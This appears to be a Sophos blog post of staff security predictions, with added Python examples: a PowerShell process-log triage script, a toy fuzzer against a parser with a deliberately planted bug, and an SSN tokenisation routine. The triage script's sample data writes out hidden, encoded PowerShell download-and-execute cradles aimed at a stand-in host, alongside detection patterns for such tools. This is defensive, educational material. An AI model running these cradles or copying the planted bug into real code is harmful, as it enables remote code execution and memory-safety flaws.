Predictions are difficult and should be handled with care, at least the ones that read every glitch, failure and fumble as a sign of the impending digital Pearl Harbour. So we at Sophos took another approach and interpreted the “tomorrow’s internet” part literally: we asked a number of people working in different technical roles at Sophos where they are actually planning to spend their time and energy in the next six months. What follows are our “from the trenches” predictions, reflecting what people are actually preparing for. We’re preparing for them to come true; maybe you should too.
1. More file-less attacks, Principal Threat Researcher 2, Fraser Howard:
To date, file-less attacks have been fairly isolated, but they seem to be growing in prominence (Poweliks, Angler for a bit, Kovter and more recently Powmet). This is a natural response to the widespread deployment of machine learning.
I also expect to see a rise in PowerShell abuse.
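One place to start preparing for PowerShell abuse is process-creation logging, since a file-less chain still has to launch powershell.exe with a command line. The script below is an added example, not Fraser’s or Sophos’s code: it triages constructed process-creation records (parent image plus command line), decodes any -EncodedCommand payload (UTF-16LE, then base64) so the real script can be scanned, and stacks indicators that are individually weak but rarely occur together in legitimate use. The scoring weights, the threshold and the sample events are assumptions for illustration, not a tuned detection.

```python
"""Triage PowerShell launches in process-creation logs.

Added example (not Sophos code). Sample events are constructed inline to look
like Windows process-creation records: (parent image, command line). The
scoring weights and the 'suspicious' threshold are assumptions for
illustration, not a tuned detection.
"""
import base64
import binascii
import re


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it:
    UTF-16LE text, then base64. Used here only to build sample data."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events: (parent process image, command line).
SAMPLE_EVENTS = [
    # 1. Maintenance script started from an interactive session.
    (r"C:\Windows\explorer.exe",
     r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    # 2. Word spawning a hidden, encoded download cradle (macro-style delivery).
    (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "powershell.exe -nop -w hidden -enc "
     + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')")),
    # 3. The same cradle in clear text, launched from cmd.exe.
    (r"C:\Windows\System32\cmd.exe",
     "powershell.exe -ep bypass -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.test/b')\""),
    # 4. Non-interactive inventory command run by a service.
    (r"C:\Windows\System32\services.exe",
     r'powershell.exe -NoProfile -NonInteractive -Command "Get-Service | Out-File C:\temp\svc.txt"'),
]

# PowerShell accepts any unambiguous prefix of a parameter name, so '-e',
# '-ec' and '-enc' all mean -EncodedCommand.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
BYPASS_RE = re.compile(r"(?i)-e(?:xecution)?p(?:olicy)?\s+bypass")
CRADLE_RE = re.compile(r"(?i)(invoke-expression|\biex\b|downloadstring|downloadfile|"
                       r"invoke-webrequest|net\.webclient|frombase64string|"
                       r"bitsadmin|start-bitstransfer)")
OFFICE_PARENT_RE = re.compile(r"(?i)\\(winword|excel|powerpnt|outlook|mshta|wscript|cscript)\.exe$")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16le", errors="replace")


def analyze(parent: str, cmdline: str) -> dict:
    """Score one PowerShell launch; the more indicators stack, the higher the score."""
    score, reasons = 0, []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
    if HIDDEN_RE.search(cmdline):
        score += 2
        reasons.append("hidden window")
    if BYPASS_RE.search(cmdline):
        score += 1
        reasons.append("execution policy bypass")
    # Scan both the visible command line and the decoded payload for cradles.
    if CRADLE_RE.search(cmdline + " " + (decoded or "")):
        score += 3
        reasons.append("download/exec cradle")
    if OFFICE_PARENT_RE.search(parent):
        score += 3
        reasons.append("launched by Office/script host")
    return {"score": score, "reasons": reasons, "decoded": decoded,
            "verdict": "suspicious" if score >= 5 else "benign"}


def triage(events=SAMPLE_EVENTS):
    """Analyze every PowerShell launch in the events and return findings in log order."""
    return [dict(parent=p, **analyze(p, c)) for p, c in events
            if re.search(r"(?i)\bpowershell(?:\.exe)?\b", c)]


if __name__ == "__main__":
    for f in triage():
        print(f["verdict"], f["score"], ", ".join(f["reasons"]) or "-")
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Two points worth noting from the sample run: the encoded cradle (event 2) would be invisible to a plain keyword match on the command line, which is exactly why the decode step comes first; and the legitimate backup script (event 1) also uses -ExecutionPolicy Bypass, so that indicator alone is kept low-weight rather than treated as a verdict.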
2. Smarter fuzzing for everyone, Senior Security Analyst 2, Stephen Edwards:
I’m expecting the sophistication of fuzzing to improve significantly. Fuzzing can be used to automatically create billions of ‘stupid’ tests and the next challenge is to make those tests smarter, by informing the test creation process with knowledge about how a program works.
Automatic exploration of code is hard though.
Hybrid techniques try to balance the speed of stupid tests with the efficiency of smarter ones, while avoiding getting lost in too many choices.
A number of promising approaches to improving fuzzing have already been demonstrated and it feels to me that we’re almost at a breakthrough where those different techniques will be combined and made public.
Stephen provided such a long and detailed response to our question that we published it as a full article too. It’s called Is security on the verge of a fuzzing breakthrough?
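The trade-off Stephen describes, fast “stupid” tests versus tests informed by how the program behaves, can be seen in miniature with a few dozen lines of Python. The code below is an added example, not Stephen’s or Sophos’s code and not taken from any fuzzing project: a toy record parser with a deliberately planted length-trust bug, instrumented with hand-placed branch ids standing in for the edge coverage a real fuzzer gets from compiler instrumentation. A blind fuzzer throws random bytes at it; a coverage-guided fuzzer keeps every mutant that reaches a new branch and mutates from that corpus, favouring the newest entry. The parser format, the bug, the mutation mix and the seeds are all constructed for illustration.

```python
"""Blind vs. coverage-guided fuzzing of a toy record parser.

Added example, not code from the article or from any fuzzing project. The
parser, its bug and the coverage instrumentation are constructed for
illustration; 'coverage' is a set of hand-placed branch ids, standing in for
the edge coverage a real fuzzer gets from compiler instrumentation.
"""
import random


def parse_record(data: bytes, cov: set) -> str:
    """Toy parser: 'FZ', version byte 2, entry count, then (tag, len, value) entries.

    Every branch records an id in `cov`. The planted bug: entry lengths are
    trusted, so a length that overruns the buffer raises IndexError when the
    last value byte (the 'checksum') is read.
    """
    cov.add("enter")
    if len(data) < 4:
        cov.add("too_short")
        return "too short"
    if data[0] != ord("F"):
        cov.add("bad_magic0")
        return "bad magic"
    cov.add("magic0_ok")
    if data[1] != ord("Z"):
        cov.add("bad_magic1")
        return "bad magic"
    cov.add("magic1_ok")
    if data[2] != 2:
        cov.add("bad_version")
        return "unsupported version"
    cov.add("version_ok")
    count, pos = data[3], 4
    for _ in range(count):
        cov.add("entry")
        if pos + 2 > len(data):
            cov.add("truncated_header")
            return "truncated entry header"
        tag, length = data[pos], data[pos + 1]
        cov.add(("tag_class", tag >> 4))
        value = data[pos + 2:pos + 2 + length]        # silently shorter than `length` if truncated
        _checksum = value[length - 1] if length else 0  # BUG: IndexError when truncated
        pos += 2 + length
    cov.add("done")
    return "ok"


def run(data: bytes):
    """Execute the target once. Returns (coverage set, crashed?)."""
    cov = set()
    try:
        parse_record(data, cov)
        return cov, False
    except IndexError:
        return cov, True


def blind_fuzz(budget: int, seed: int = 1):
    """'Stupid' tests: fresh random bytes every iteration, no feedback at all."""
    rng = random.Random(seed)
    for i in range(1, budget + 1):
        data = bytes(rng.randrange(256) for _ in range(rng.randint(1, 12)))
        if run(data)[1]:
            return i, data
    return None


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Cheap mutations: overwrite, insert or delete a single byte."""
    buf = bytearray(data)
    r = rng.random()
    if r < 0.5 or len(buf) < 2:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif r < 0.75:
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    else:
        del buf[rng.randrange(len(buf))]
    return bytes(buf)


def guided_fuzz(budget: int, seed: int = 1, start: bytes = b"hello world"):
    """Coverage-guided: keep any mutant that reaches a new branch, mutate from
    the corpus, and spend half the effort on the newest entry (the frontier)."""
    rng = random.Random(seed)
    cov_seen, _ = run(start)
    corpus = [start]
    for i in range(1, budget + 1):
        parent = corpus[-1] if rng.random() < 0.5 else rng.choice(corpus)
        data = mutate(parent, rng)
        cov, crashed = run(data)
        if crashed:
            return i, data
        if not cov <= cov_seen:        # reached something new: keep it as a stepping stone
            cov_seen |= cov
            corpus.append(data)
    return None


if __name__ == "__main__":
    print("blind :", blind_fuzz(20_000))
    print("guided:", guided_fuzz(300_000))
```

The blind fuzzer has to guess three specific bytes at once (about one chance in sixteen million per try), so it almost never gets past the magic check. The guided fuzzer only ever has to guess one byte at a time, because each correct byte opens a branch it has not seen before and that input becomes the base for the next round; it typically reaches the crash in a few tens of thousands of iterations. This is the “knowledge about how a program works” Stephen refers to, obtained automatically rather than written by hand, and the reason hybrid approaches try to keep the throughput of the dumb loop while steering it with this kind of feedback.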
3. Ask who and what, not where, Cybersecurity Specialist, Mark Lanczak-Faulds:
Traditionally, security focuses on the domain as a whole. As we look to blur the boundaries of a traditional network and the internet, what matters are the identities and assets residing within the domain.
We need to determine risk based on identity and the assets associated with that identity. When you trigger an alert accounting for those factors, you know what’s at stake and can act proportionately and swiftly.
4. Focus on exploit mitigation, Sophos Security Specialist, Greg Iddon:
Patching is no longer something you can save until after change freeze or a rainy day.
I think that in the next six to twelve months, implementing exploit mitigation – protection against the abuse of known or unknown bugs and vulnerabilities, and the underlying way attackers take advantage of these bugs and vulnerabilities – is going to be key to staying ahead.
What concerns me most is that there is a swathe of new vendors who are only focussing on detection of Portable Executable (PE) files, touting machine learning as the be-all and end-all of endpoint security. This simply isn’t true.
Don’t get me wrong, machine learning is great, but it’s just a single layer in what must be a multi-layered approach to security.
5. Ransomware repurposed, Global Escalation Support Engineer, Peter Mackenzie:
Based on some trends we’re seeing now I think we could see a shift in the way that ransomware is used.
Unlike most other malware, ransomware is noisy and scary – it doesn’t work unless you know you’ve got it, and it has to make you feel afraid. As security tools get better at dealing with ransomware, some attackers are using that noisiness as a technique for hiding something else, or as a last resort after making money off you another way using, say, key loggers or cryptocurrency miners.
Once you’ve removed the noisy ransomware infection it’s easy to think you’ve cleaned your system. What you need to ask is “why did it detonate now?” and “what else was, or still is, running on the computer where we found the ransomware?”
6. Data is a liability, not an asset, Senior Cybersecurity Director, Ross McKerchar:
I expect to spend a lot of time in the next 6 months deleting unnecessary data and generally being very careful about what we store and where. It’s a defence in depth measure – the less you store the less you have to lose.
This applies across entire companies but, probably more importantly, to exposed assets such as web servers too. They should only have access to the minimum amount of data they need and nothing more. Why does a web server need to have access to someone’s SSN, for example? You may need it for other reasons, or your web server may need to collect an SSN once, but does it need to keep it?
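Ross’s SSN question has a concrete answer in code: the web tier collects the value once, hands it on to the system that actually needs it, and retains at most a keyed token that still supports an equality check (for de-duplication or lookup) without holding the number itself. The example below is added here and is not Ross’s or Sophos’s code; the record layout, the allow-list of retained fields and the demo key are constructed for illustration. The token is an HMAC rather than a plain hash because the SSN space is only about a billion values, small enough to brute-force an unkeyed hash in minutes; for the same reason the key must live off the exposed web server, or a compromise of that server hands the attacker everything the minimization was meant to protect.

```python
"""Data minimization for records passing through an exposed web tier.

Added example, not Sophos code. The record layout, the retention policy and
the key are constructed for illustration. The web tier forwards the full
request to the back end that needs it and keeps only what minimize() returns.
"""
import hashlib
import hmac
import re

# Constructed retention policy for the web tier (an assumption, not a standard).
KEEP_FIELDS = {"account_id", "email", "submitted_at"}
TOKENIZE_FIELDS = {"ssn"}
# Constructed demo key. In practice the key is held by the back end or an HSM,
# never on the web server: with it, an attacker can enumerate the ~1e9 SSN space.
DEMO_KEY = b"demo-key-not-for-production"


def normalize_ssn(ssn: str) -> str:
    """Canonical 9-digit form so '123-45-6789' and '123456789' tokenize identically."""
    digits = re.sub(r"\D", "", ssn)
    if len(digits) != 9:
        raise ValueError("SSN must contain exactly 9 digits")
    return digits


def tokenize(value: str, key: bytes = DEMO_KEY) -> str:
    """Keyed, non-reversible token: equality checks still work, the value is gone."""
    return hmac.new(key, normalize_ssn(value).encode(), hashlib.sha256).hexdigest()


def minimize(record: dict, key: bytes = DEMO_KEY) -> dict:
    """Return only what the web tier is allowed to retain: allow-listed fields,
    tokens for identifiers it must still be able to match on, and nothing else."""
    kept = {k: v for k, v in record.items() if k in KEEP_FIELDS}
    for field in TOKENIZE_FIELDS & record.keys():
        kept[field + "_token"] = tokenize(record[field], key)
    # Every field the policy does not name (here: dob, card_number) is dropped.
    return kept


def matches(token: str, candidate: str, key: bytes = DEMO_KEY) -> bool:
    """Constant-time check whether a presented SSN corresponds to a stored token."""
    return hmac.compare_digest(token, tokenize(candidate, key))


# Constructed sample request as the web tier would have received it.
SAMPLE_REQUEST = {
    "account_id": "A-1001",
    "email": "user@example.test",
    "submitted_at": "2017-10-01T12:00:00Z",
    "ssn": "123-45-6789",
    "dob": "1980-01-01",
    "card_number": "4111111111111111",
}

if __name__ == "__main__":
    retained = minimize(SAMPLE_REQUEST)
    print(retained)
    print("same person re-submits:", matches(retained["ssn_token"], "123 45 6789"))
```

The allow-list is the important design choice: fields are dropped by default and kept only when named, so a new field added to the form is not silently retained on the web server until someone remembers to exclude it.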